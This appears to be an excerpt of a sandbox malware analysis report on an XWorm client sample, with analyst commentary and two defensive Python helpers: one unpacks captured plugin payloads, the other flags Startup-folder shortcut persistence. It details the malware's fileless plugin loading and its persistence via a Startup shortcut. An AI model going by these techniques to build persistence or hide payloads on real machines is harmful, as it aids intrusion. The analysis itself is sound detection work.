                      Source: NzEsfIiAc0.exe, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                      Source: NzEsfIiAc0.exe, Messages.cs | .Net Code: Memory
                      Source: XClient.exe.0.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: XClient.exe.0.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                      Source: XClient.exe.0.dr, Messages.cs | .Net Code: Memory
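The .Net Code entries above document the plugin path: the client base64-decodes Pack[3], runs it through Helper.Decompress, hands the bytes to System.AppDomain.Load(byte[]) and then calls into the loaded assembly through a late-bound Invoke, so the plugin never touches disk. The Python below is an added analyst helper, not code from the report or from the XWorm client: it replays that unpack step on a captured Pack message and checks that the result is a managed PE, i.e. a PE whose IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (directory index 14, the same directory the static PE line in this section names) is populated. Assumptions: the body of Helper.Decompress is not shown, so GZip is tried first with zlib and raw DEFLATE as fallbacks; the meaning of Pack[0] and Pack[1] is guessed (only Pack[2] and Pack[3] appear in the decompiled call); and the "plugin" fed through it is a constructed stub PE, not a real plugin.

```python
import base64
import gzip
import struct
import zlib


def decompress_payload(blob: bytes) -> bytes:
    """Undo Helper.Decompress. The report does not show the algorithm, so GZip
    (assumption) is tried first, then zlib and raw DEFLATE for variants that
    swapped the stream wrapper."""
    try:
        return gzip.decompress(blob)
    except (OSError, EOFError, zlib.error):
        pass
    for wbits in (zlib.MAX_WBITS, -zlib.MAX_WBITS):  # zlib-wrapped, then raw
        try:
            return zlib.decompress(blob, wbits)
        except zlib.error:
            continue
    raise ValueError("payload is not gzip, zlib or raw DEFLATE")


def is_managed_pe(data: bytes) -> bool:
    """True when data is a PE with a populated CLR header directory
    (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, index 14), which is what
    AppDomain.Load(byte[]) needs to succeed."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    opt = e_lfanew + 4 + 20                       # optional header follows the 20-byte COFF header
    if len(data) < opt + 2:
        return False
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                            # PE32
        n_off, dd_off = opt + 92, opt + 96
    elif magic == 0x20B:                          # PE32+
        n_off, dd_off = opt + 108, opt + 112
    else:
        return False
    if len(data) < dd_off + 15 * 8:
        return False
    if struct.unpack_from("<I", data, n_off)[0] < 15:  # NumberOfRvaAndSizes
        return False
    rva, size = struct.unpack_from("<II", data, dd_off + 14 * 8)
    return rva != 0 and size != 0


def recover_plugin(pack: list) -> tuple:
    """Replay the client's unpack step on a captured Pack message.
    Returns (Pack[2] identifier, plugin bytes, is_managed_pe)."""
    plugin = decompress_payload(base64.b64decode(pack[3]))
    return pack[2], plugin, is_managed_pe(plugin)


def build_fake_managed_pe() -> bytes:
    """Constructed stand-in for a plugin: a minimal PE32+ with no sections and a
    non-empty CLR directory entry. It is not loadable; it only exercises the checks."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x2022)  # x64, SizeOfOptionalHeader=240
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                         # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 14 * 8, 0x2008, 0x48)      # CLR header RVA/size
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def build_pack_message(plugin: bytes, identifier: str) -> list:
    """Constructed C2 message with the indexes the client uses (Pack[2], Pack[3]);
    the contents of Pack[0] and Pack[1] are assumptions."""
    return ["", "plugin", identifier, base64.b64encode(gzip.compress(plugin)).decode("ascii")]


if __name__ == "__main__":
    msg = build_pack_message(build_fake_managed_pe(), "plugin-0")
    ident, blob, managed = recover_plugin(msg)
    print(ident, len(blob), "managed PE" if managed else "not a managed PE")
```

On a real capture, feed the split message fields into recover_plugin and write the returned bytes out for dnSpy or ilspycmd; a False from is_managed_pe usually means the wrapper was not GZip or the message was split on the wrong separator (Settings.SPL in the first .Net Code line).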
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Code function: 0_2_00007FFD34773891 pushad ; iretd 0_2_00007FFD34773981
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Code function: 0_2_00007FFD347705FA push ebx; retf 0_2_00007FFD3477060A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3468D2A5 pushad ; iretd 2_2_00007FFD3468D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34872316 push 8B485F91h; iretd 2_2_00007FFD3487231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD3466D2A5 pushad ; iretd 5_2_00007FFD3466D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD34852316 push 8B485F93h; iretd 5_2_00007FFD3485231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD3465D2A5 pushad ; iretd 10_2_00007FFD3465D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD34842316 push 8B485F94h; iretd 10_2_00007FFD3484231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD3466D2A5 pushad ; iretd 13_2_00007FFD3466D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD3478C2C5 push ebx; iretd 13_2_00007FFD3478C2DA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FFD34852316 push 8B485F93h; iretd 13_2_00007FFD3485231B
                      Note: every hit above sits at a 0x00007FFD... address inside a 64-bit process, and the same pattern fires in the unmodified powershell.exe. pushad is not a valid 64-bit-mode instruction and "push ebx" is the 32-bit reading of push rbx, so these are 32-bit disassembly artefacts from scanning JIT-compiled managed code, not evidence of a packer; the .Net Code entries (AppDomain.Load of a decompressed byte[] plus late-bound Invoke) are the substantive obfuscation findings in this section.
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | File created: C:\Users\user\AppData\Roaming\XClient.exe (dropped file)
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
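The LNK entry earlier in this section (XClient.lnk.0.dr, relative path ..\..\..\..\..\XClient.exe) together with the two File created lines is the persistence mechanism: a shortcut in the per-user Startup folder whose RELATIVE_PATH climbs five directories out of Startup and lands on the dropped %APPDATA%\XClient.exe. Below is an added example, not code from the report or from the sample: a Python parser for the StringData block of the MS-SHLLINK format that resolves RELATIVE_PATH the way the shell does and flags Startup shortcuts whose target sits directly in a user-writable profile directory. The .lnk bytes are constructed for the test (build_lnk writes only a header and a Unicode RELATIVE_PATH), and the list of "user-writable" directories is a heuristic chosen here, not a rule from the report.

```python
import ntpath
import struct

# LinkFlags bits from MS-SHLLINK section 2.1.1 that this parser needs.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
HEADER_SIZE = 0x4C
# StringData fields appear in this fixed order, each only if its flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
# Heuristic (assumption): a Startup shortcut whose target lives directly in one
# of these directories is worth a look. The XClient.lnk case resolves to Roaming.
USER_WRITABLE_DIRS = ("\\appdata\\roaming", "\\appdata\\local",
                      "\\appdata\\local\\temp", "\\users\\public")


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a Shell Link. The LinkTargetIDList and
    LinkInfo blocks are skipped by their size fields, not decoded."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link header")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]   # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]       # LinkInfoSize includes itself
    fields = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]      # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


def resolve_relative_target(lnk_path: str, relative_path: str) -> str:
    """Resolve RELATIVE_PATH against the directory holding the .lnk, as the shell does."""
    return ntpath.normpath(ntpath.join(ntpath.dirname(lnk_path), relative_path))


def assess_startup_lnk(lnk_path: str, data: bytes) -> tuple:
    """(resolved target or None, suspicious) for a .lnk found in a Startup folder."""
    rel = parse_lnk_strings(data).get("relative_path")
    if rel is None:
        return None, False
    target = resolve_relative_target(lnk_path, rel)
    parent = ntpath.dirname(target).lower()
    return target, parent.endswith(USER_WRITABLE_DIRS)


def build_lnk(relative_path: str) -> bytes:
    """Constructed minimal .lnk carrying only a Unicode RELATIVE_PATH, for tests."""
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    header[4:20] = bytes.fromhex("0114020000000000c000000000000046")   # CLSID_ShellLink
    struct.pack_into("<I", header, 0x14, HAS_RELATIVE_PATH | IS_UNICODE)
    return bytes(header) + struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")


if __name__ == "__main__":
    startup = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
    lnk = ntpath.join(startup, "XClient.lnk")
    print(assess_startup_lnk(lnk, build_lnk(r"..\..\..\..\..\XClient.exe")))
```

Real shortcuts usually also carry a LinkTargetIDList and LinkInfo with an absolute LocalBasePath; when both are present, compare the absolute path with the resolved RELATIVE_PATH, since a mismatch is itself a sign the file was hand-built rather than created by Explorer.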

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 identical entries in the report)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 identical entries in the report)
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Process information set: NOOPENFILEERRORBOX (SetErrorMode SEM_NOOPENFILEERRORBOX, which suppresses the message box on failed file opens; 59 identical entries in the report)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (at least 115 identical entries in the report)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
